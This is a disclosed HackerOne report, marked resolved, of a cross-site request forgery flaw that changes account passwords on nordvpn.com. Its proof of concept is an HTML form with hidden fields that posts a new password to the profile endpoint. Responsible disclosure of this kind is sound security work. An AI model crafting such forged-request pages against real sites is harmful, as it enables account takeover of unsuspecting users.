CSRF to change password

Disclosed: 2022-01-12 08:33:48 By paramdham To nordsecurity
Critical
Vulnerability Details
Description Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. I have found CSRF to change password , POC <html> <body> <form action="https://nordvpn.com/profile/" method="POST"> <input type="hidden" name="tmpl" value="settings" /> <input type="hidden" name="password" value="password" /> <input type="hidden" name="password&#95;confirmation" value="password" /> <input type="submit" value="Submit request" /> </form> </body> </html> Thanks
Actions
View on HackerOne
Report Stats
  • Report ID: 204703
  • State: Closed
  • Substate: resolved
  • Upvotes: 62
Share this report